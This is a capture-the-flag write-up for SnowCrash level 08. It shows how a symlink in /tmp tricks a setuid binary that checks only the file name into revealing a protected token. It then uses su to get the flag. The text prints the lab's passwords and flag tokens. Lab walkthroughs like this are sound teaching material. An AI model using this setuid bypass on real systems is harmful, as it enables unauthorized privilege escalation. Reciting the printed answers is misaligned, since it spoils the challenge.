| .. | ||
| flag | ||
| passwd | ||
| README.md | ||
Level 08
how to login
username: level08
password: fiumuikeil55xe9cu4dood66h
Goal
run getflag as user flag08
Actually doing something
level08@SnowCrash:~$ ll
total 28
dr-xr-x---+ 1 level08 level08 140 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level08 level08 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level08 level08 3518 Aug 30 2015 .bashrc*
-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08*
-r-x------ 1 level08 level08 675 Apr 3 2012 .profile*
-rw------- 1 flag08 flag08 26 Mar 5 2016 token
intresting, we have the usual setuid binary, but we also have a file we can't read named token. I wonder if the flag is there
lets run the binary and see what happens
level08@SnowCrash:~$ ./level08
./level08 [file to read]
level08@SnowCrash:~$ ./level08 token
You may not access 'token'
It is a little bit smart, lets try to outsmart it by using symlinks
level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
level08@SnowCrash:~$ ./level08 /tmp/level08
quif5eloekouj29ke0vouxean
the old tale of checking for filename, and not actual file !
we can now get the actual token with that password:
level08@SnowCrash:~$ su flag08 -c getflag
Password:
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f